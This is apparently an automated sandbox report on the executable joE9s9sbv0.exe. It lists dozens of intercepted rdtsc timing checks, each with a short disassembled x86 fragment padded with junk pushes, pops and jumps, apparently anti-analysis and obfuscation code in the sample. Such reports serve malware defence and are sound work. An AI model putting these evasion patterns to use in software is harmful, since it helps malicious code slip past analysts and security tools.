Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B0557C second address: B055AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FDC00CE27B3h 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDC00CE27B5h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B055AF second address: B055B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B056EB second address: B056F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDC00CE27A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B056F5 second address: B05718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 jmp 00007FDC0050BD54h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05BA9 second address: B05BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05BAD second address: B05BB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05BB3 second address: B05BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDC00CE27ACh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FDC00CE27BCh 0x00000015 jg 00007FDC00CE27BBh 0x0000001b jmp 00007FDC00CE27B3h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05DA8 second address: B05DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B05DAD second address: B05DB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06450 second address: B06465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06465 second address: B06483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDC00CE27B8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06AFD second address: B06B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDC0050BD4Bh 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06B13 second address: B06B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B049F3 second address: B049F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B049F9 second address: B049FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B0C4A9 second address: B0C4CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDC0050BD52h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FDC0050BD4Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B1E844 second address: B1E851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FDC00CE27B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B22D0F second address: B22D2B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDC0050BD46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDC0050BD50h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27BEA second address: B27BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27BF0 second address: B27BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27BF4 second address: B27C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDC00CE27B0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27C21 second address: B27C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27C30 second address: B27C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27C47 second address: B27C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B2F7C5 second address: B2F807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B9h 0x00000007 jmp 00007FDC00CE27B5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FDC00CE27C2h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FDC00CE27A6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B33713 second address: B33717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B33717 second address: B3373B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FDC00CE27A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3373B second address: B3373F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39615 second address: B3961B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3961B second address: B3964C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDC0050BD4Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FDC0050BD46h 0x00000011 jbe 00007FDC0050BD46h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDC0050BD4Ah 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3964C second address: B39651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39651 second address: B39659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39659 second address: B3965D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38031 second address: B38035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38035 second address: B38039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38039 second address: B3804A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FDC0050BD46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3835E second address: B38364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38364 second address: B38372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FDC0050BD46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38372 second address: B38390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDC00CE27B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B384EF second address: B384F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3862D second address: B38633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38633 second address: B38675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Dh 0x00000009 popad 0x0000000a jmp 00007FDC0050BD57h 0x0000000f pushad 0x00000010 jmp 00007FDC0050BD56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38675 second address: B3867B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B387D6 second address: B387F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD57h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B387F2 second address: B387F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38961 second address: B38967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39357 second address: B39375 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDC00CE27A6h 0x00000008 jmp 00007FDC00CE27B4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3E19F second address: B3E1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007FDC0050BD46h 0x00000013 jp 00007FDC0050BD46h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3E1C2 second address: B3E1E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FDC00CE27A6h 0x00000009 jmp 00007FDC00CE27B7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3E1E4 second address: B3E1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B4208C second address: B42090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B42090 second address: B42094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B42094 second address: B4209A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B4209A second address: B420A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B420A4 second address: B420C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDC00CE27B2h 0x0000000c popad 0x0000000d push ebx 0x0000000e push ebx 0x0000000f jnp 00007FDC00CE27A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7DA66 second address: B7DA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7DA72 second address: B7DA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDC00CE27A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7DA81 second address: B7DAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD57h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FDC0050BD4Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7FF9F second address: B7FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007FDC00CE27A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7FFAC second address: B7FFD6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDC0050BD4Eh 0x00000008 pushad 0x00000009 jmp 00007FDC0050BD57h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B8F530 second address: B8F534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B8F534 second address: B8F538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B8F538 second address: B8F53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B92BF9 second address: B92C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDC0050BD46h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FDC0050BD4Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B92C15 second address: B92C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FDC00CE27B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B92C43 second address: B92C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949E0 second address: B949E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949E4 second address: B949E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949E8 second address: B949FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27AAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949FB second address: B94A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B9480F second address: B94813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94813 second address: B9481D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDC0050BD46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B9481D second address: B94829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94829 second address: B9482D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B9482D second address: B94848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94848 second address: B94854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDC0050BD46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94854 second address: B94858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C62647 second address: C6264B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6264B second address: C6265E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ADh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61571 second address: C61575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C616E2 second address: C616E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6185C second address: C61866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61866 second address: C6186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61F10 second address: C61F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Bh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61F20 second address: C61F61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ADh 0x00000007 jmp 00007FDC00CE27ACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jno 00007FDC00CE27AEh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDC00CE27B3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6673C second address: C66779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD53h 0x00000009 popad 0x0000000a jo 00007FDC0050BD5Fh 0x00000010 jmp 00007FDC0050BD59h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C669CD second address: C669EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FDC00CE27AEh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B1B second address: C66B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B1F second address: C66B38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B38 second address: C66B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B3E second address: C66B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6A464 second address: C6A468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6000A second address: 6F60083 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDC00CE27B6h 0x00000008 adc ah, FFFFFFE8h 0x0000000b jmp 00007FDC00CE27ABh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FDC00CE27B8h 0x00000019 sub si, 8048h 0x0000001e jmp 00007FDC00CE27ABh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FDC00CE27B6h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movzx eax, bx 0x00000032 mov edi, 00E286ECh 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60083 second address: 6F60089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60089 second address: 6F6008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6008D second address: 6F600C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FDC0050BD50h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDC0050BD4Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F600C0 second address: 6F600C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F600C4 second address: 6F600CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
